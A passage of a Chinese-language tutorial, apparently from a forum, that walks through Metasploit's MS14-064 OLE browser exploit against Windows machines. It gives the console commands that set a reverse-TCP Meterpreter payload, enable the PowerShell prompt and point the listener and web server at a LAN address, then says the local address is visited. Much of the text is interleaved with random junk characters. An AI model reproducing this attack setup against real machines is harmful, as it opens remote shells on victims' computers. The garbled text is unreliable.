3 a4 s4 }2 j( |: ]
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
# j8 V, e$ j, U
$ B; g3 v9 G4 i9 p g1 M
3 W: G) w" Z2 c# }6 q; I- M9 @
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
, x4 @$ ^2 @ r" R: \" k: C
! `7 G) o9 t/ Z% l- P# P" i
0 p) b. t! i' r
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp+ P; p( x5 h* i: A+ k
) \: d0 }" ?" ^" r/ L
v. s2 r6 w( a w& U$ {1 h set AllowPowershellPrompt true
0 e, r1 A v7 K
0 W4 z! T5 l- I/ Z$ W; h
- u, Y' e% k/ f* a" h) J Set LHOST 192.168.0.109) D+ }- P* h0 E( J0 R
9 \' Q. v: k- e" v
9 u `! e7 ~% O( t$ d" F set SRVHOST 192.168.0.109: {1 j% J, B1 m" k/ _2 R8 ~
- n# z" b: o# j: C: n! i1 v2 p
) V6 G1 m1 z1 T* \ Set uripath share
: C- L% f) M y, ~/ X! P
' H9 `/ Q6 |* Y' w1 z
/ e2 h2 N8 q! C. e9 u Set srvport 80
5 j4 H$ b+ x9 r* D% Q' s
! ?/ T4 o+ w; u3 j
+ j' j9 ^" f0 t# Z
% s* l. ^$ v- h9 B9 m1 O
8 R3 V0 t# [3 R( j$ V
$ G( z+ B: [8 D3 c* ~7 l T: j, N
C: {9 K* g9 ~% g# @7 a
; l6 K* a; i" t' F' N; c* b
& N1 d4 I1 B- }! q& W( ?* V. g# d
+ L+ H. B& o o
* F# e' M) m6 E0 A6 F' W; A/ Z( f* ` w. z0 }4 b
3 C; z' F0 p; g% r* b
) j/ w) K! ~, h. E2 ]4 N+ m8 b, ~2 x6 \' F. H! v
2 u) s9 J3 Y% z6 d4 F
$ u7 a1 |" F- W7 n2 k6 L
& t+ j* w( o) L2 ?$ o, z1 u* z; W
下面我们来访问本地地址如图:. V6 S1 l$ X8 k7 u* N" u4 Q" ?6 E
3 M0 @) L t, J/ `" Z% ^
4 ~ B& r% j+ ^! y: P
9 e* n" j4 X# o& k" m
/ Q- C e- J0 P3 V) j9 L+ `) R+ u: G. n0 q; N6 }: q
7 T. u% ?' ?* Q. o$ k5 p3 M2 m
0 A V5 @+ ?. |
) L; s8 A' _: ?) |- g
7 Q! q5 ~1 s* Y% g